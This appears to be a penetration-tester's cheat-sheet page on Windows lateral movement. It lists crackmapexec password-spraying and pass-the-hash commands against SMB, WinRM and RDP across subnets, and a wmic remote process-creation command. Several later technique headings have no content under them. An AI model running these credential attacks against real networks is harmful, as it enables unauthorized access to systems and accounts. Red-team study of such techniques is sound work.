Lateral Movement
https://wadcoms.github.io/#
Spraying with crackmapexec
crackmapexec smb <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>crackmapexec winrm <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>crackmapexec rdp <IP/SUBNET> -u users.txt -p passwords.txt --continue-on-success --rdp-timeout 30crackmapexec smb <IP/SUBNET> -u users.txt -hashes <HASH> -d <domain>crackmapexec winrm <IP/SUBNET> -u users.txt -hashes <HASH> -d <domain>WMI / WinRM (PORT 5985 / 5986)
WMI
wmic /node:<IP> /user:<USER> /password:<PASSWORD> process call create "calc"WinRM
PsExec /wmiexec / smbexec (PORT 445)
Pass the Hash
Pass the password
Pass the hash
Overpass the hash
Pass the ticket
DCOM
Last updated